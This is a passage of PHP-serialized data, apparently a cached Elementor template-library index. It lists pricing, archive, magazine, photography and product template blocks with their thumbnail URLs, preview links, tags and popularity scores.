5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.5.jpg\";s:12:\"tmpl_created\";i:1528700484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:318;s:11:\"trend_index\";i:283;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:291;a:14:{s:2:\"id\";i:12688;s:5:\"title\";s:30:\"Magazine &#8211; Single Post 1\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/01/Post2_s.png\";s:12:\"tmpl_created\";i:1579060692;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/magazine-single-post-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:405;s:11:\"trend_index\";i:204;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:292;a:14:{s:2:\"id\";i:4500;s:5:\"title\";s:9:\"Pricing 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_1.png\";s:12:\"tmpl_created\";i:1520443308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:465;s:11:\"trend_index\";i:524;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:293;a:14:{s:2:\"id\";i:8985;s:5:\"title\";s:9:\"archive 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.6.jpg\";s:12:\"tmpl_created\";i:1528700612;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:208;s:11:\"trend_index\";i:350;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:294;a:14:{s:2:\"id\";i:12678;s:5:\"title\";s:23:\"Magazine &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-magazine.png\";s:12:\"tmpl_created\";i:1579060701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/magazine-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:28:\"[\"Blog\",\"header\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:316;s:11:\"trend_index\";i:304;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:295;a:14:{s:2:\"id\";i:4509;s:5:\"title\";s:9:\"Pricing 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_1.png\";s:12:\"tmpl_created\";i:1520443310;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:637;s:11:\"trend_index\";i:654;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:296;a:14:{s:2:\"id\";i:8989;s:5:\"title\";s:9:\"archive 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.7.jpg\";s:12:\"tmpl_created\";i:1528701063;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:205;s:11:\"trend_index\";i:189;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:297;a:14:{s:2:\"id\";i:12669;s:5:\"title\";s:23:\"Magazine &#8211; Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Footer_s.png\";s:12:\"tmpl_created\";i:1579060715;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/magazine-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:28:\"[\"Blog\",\"footer\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:470;s:11:\"trend_index\";i:385;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:298;a:14:{s:2:\"id\";i:4521;s:5:\"title\";s:9:\"Pricing 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_2.png\";s:12:\"tmpl_created\";i:1520443312;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:311;s:11:\"trend_index\";i:315;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:299;a:14:{s:2:\"id\";i:8996;s:5:\"title\";s:9:\"archive 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.8.jpg\";s:12:\"tmpl_created\";i:1528701290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:213;s:11:\"trend_index\";i:426;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:300;a:14:{s:2:\"id\";i:12661;s:5:\"title\";s:23:\"Magazine &#8211; Search\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Search_s.png\";s:12:\"tmpl_created\";i:1579060722;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/magazine-search/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:457;s:11:\"trend_index\";i:255;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:301;a:14:{s:2:\"id\";i:4529;s:5:\"title\";s:9:\"Pricing 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_2.png\";s:12:\"tmpl_created\";i:1520443314;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:564;s:11:\"trend_index\";i:596;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:302;a:14:{s:2:\"id\";i:9001;s:5:\"title\";s:9:\"archive 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.9.jpg\";s:12:\"tmpl_created\";i:1528701433;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/archive-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:265;s:11:\"trend_index\";i:353;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:303;a:14:{s:2:\"id\";i:12652;s:5:\"title\";s:17:\"Magazine- Archiv2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv2_s.png\";s:12:\"tmpl_created\";i:1579060730;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/magazine-archiv2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:529;s:11:\"trend_index\";i:442;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:304;a:14:{s:2:\"id\";i:4537;s:5:\"title\";s:9:\"Pricing 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_3.png\";s:12:\"tmpl_created\";i:1520443315;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:532;s:11:\"trend_index\";i:533;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:305;a:14:{s:2:\"id\";i:9119;s:5:\"title\";s:10:\"footer 015\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/Footer_GetStarted_350.png\";s:12:\"tmpl_created\";i:1532428138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/blocks/demo/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:252;s:11:\"trend_index\";i:269;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:306;a:14:{s:2:\"id\";i:12643;s:5:\"title\";s:24:\"Magazine &#8211; Archiv1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv1_s.png\";s:12:\"tmpl_created\";i:1579060737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/magazine-archiv1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:400;s:11:\"trend_index\";i:231;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:307;a:14:{s:2:\"id\";i:4545;s:5:\"title\";s:9:\"Pricing 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_3.png\";s:12:\"tmpl_created\";i:1520443317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:633;s:11:\"trend_index\";i:631;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:308;a:14:{s:2:\"id\";i:9127;s:5:\"title\";s:9:\"header 13\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2018/07/Header_get_started_1200V3.png\";s:12:\"tmpl_created\";i:1532428699;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/header-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:59;s:11:\"trend_index\";i:71;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:309;a:14:{s:2:\"id\";i:12635;s:5:\"title\";s:20:\"Magazine &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/01/404_s.png\";s:12:\"tmpl_created\";i:1579060746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/magazine-404/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:25:\"[\"404\",\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:611;s:11:\"trend_index\";i:582;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:310;a:14:{s:2:\"id\";i:4553;s:5:\"title\";s:10:\"Pricing 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_4.png\";s:12:\"tmpl_created\";i:1520443319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:477;s:11:\"trend_index\";i:543;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:311;a:14:{s:2:\"id\";i:12736;s:5:\"title\";s:41:\"Slide In | Contact Us | Magazine and Blog\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_contact_s.png\";s:12:\"tmpl_created\";i:1579060978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/slide-in-contact-us/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:679;s:11:\"trend_index\";i:662;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:312;a:14:{s:2:\"id\";i:4562;s:5:\"title\";s:9:\"Pricing 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_4.png\";s:12:\"tmpl_created\";i:1520443322;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:626;s:11:\"trend_index\";i:677;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:313;a:14:{s:2:\"id\";i:12726;s:5:\"title\";s:52:\"Classic | Newsletter | Subscribe | Magazine and Blog\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_Newsletter_s.png\";s:12:\"tmpl_created\";i:1579061019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-newsletter-subscribe-magazine-and-blog/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:441;s:11:\"trend_index\";i:265;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:314;a:14:{s:2:\"id\";i:4572;s:5:\"title\";s:10:\"Pricing 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_5.png\";s:12:\"tmpl_created\";i:1520443324;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:307;s:11:\"trend_index\";i:293;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:315;a:14:{s:2:\"id\";i:9174;s:5:\"title\";s:17:\"single product 01\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product01_350.png\";s:12:\"tmpl_created\";i:1532950125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:47;s:11:\"trend_index\";i:14;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:316;a:14:{s:2:\"id\";i:13089;s:5:\"title\";s:23:\"Photography &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/02/404_s.png\";s:12:\"tmpl_created\";i:1582091623;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/photography-404/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:33:\"[\"404\",\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:670;s:11:\"trend_index\";i:633;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:317;a:14:{s:2:\"id\";i:4580;s:5:\"title\";s:10:\"Pricing 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_6.png\";s:12:\"tmpl_created\";i:1520443326;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:527;s:11:\"trend_index\";i:567;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:318;a:14:{s:2:\"id\";i:9178;s:5:\"title\";s:17:\"single product 02\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product02_350new.png\";s:12:\"tmpl_created\";i:1532951997;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-02/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:89;s:11:\"trend_index\";i:31;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:319;a:14:{s:2:\"id\";i:13096;s:5:\"title\";s:32:\"Photography &#8211; Archiv Media\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/02/Archiv_s.png\";s:12:\"tmpl_created\";i:1582091742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/photography-archiv-media/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:27:\"[\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:607;s:11:\"trend_index\";i:537;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:320;a:14:{s:2:\"id\";i:4589;s:5:\"title\";s:9:\"Pricing 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_6.png\";s:12:\"tmpl_created\";i:1520443327;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:642;s:11:\"trend_index\";i:688;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:321;a:14:{s:2:\"id\";i:9180;s:5:\"title\";s:17:\"single product 03\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product03_350.png\";s:12:\"tmpl_created\";i:1532952302;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-03/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:131;s:11:\"trend_index\";i:70;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:322;a:14:{s:2:\"id\";i:13103;s:5:\"title\";s:26:\"Photography &#8211; Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/02/Footer_s.png\";s:12:\"tmpl_created\";i:1582091903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/photography-footer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:36:\"[\"footer\",\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:474;s:11:\"trend_index\";i:408;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:323;a:14:{s:2:\"id\";i:4597;s:5:\"title\";s:10:\"Pricing 13\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_7.png\";s:12:\"tmpl_created\";i:1520443330;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:558;s:11:\"trend_index\";i:689;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:324;a:14:{s:2:\"id\";i:9182;s:5:\"title\";s:17:\"single product 04\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product040_350.png\";s:12:\"tmpl_created\";i:1532952606;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-04/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:147;s:11:\"trend_index\";i:80;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:325;a:14:{s:2:\"id\";i:13120;s:5:\"title\";s:31:\"Photography &#8211; Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/02/Post_s.png\";s:12:\"tmpl_created\";i:1582092351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/photography-single-post/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:27:\"[\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:647;s:11:\"trend_index\";i:591;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:326;a:14:{s:2:\"id\";i:4605;s:5:\"title\";s:9:\"Pricing 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_7.png\";s:12:\"tmpl_created\";i:1520443332;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:659;s:11:\"trend_index\";i:694;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:327;a:14:{s:2:\"id\";i:9239;s:5:\"title\";s:17:\"product archive 1\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-1.png\";s:12:\"tmpl_created\";i:1532953482;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/product-archive-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:86;s:11:\"trend_index\";i:35;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:328;a:14:{s:2:\"id\";i:13112;s:5:\"title\";s:26:\"Photography &#8211; Header\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-photography-portfolio.png\";s:12:\"tmpl_created\";i:1582092483;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/photography-header/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:36:\"[\"header\",\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:353;s:11:\"trend_index\";i:175;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:329;a:14:{s:2:\"id\";i:4613;s:5:\"title\";s:10:\"Pricing 14\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_8.png\";s:12:\"tmpl_created\";i:1520443334;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:524;s:11:\"trend_index\";i:529;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:330;a:14:{s:2:\"id\";i:9247;s:5:\"title\";s:17:\"product archive 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-2.png\";s:12:\"tmpl_created\";i:1532953793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/product-archive-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:98;s:11:\"trend_index\";i:32;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:331;a:14:{s:2:\"id\";i:13129;s:5:\"title\";s:28:\"Classic | Menu | 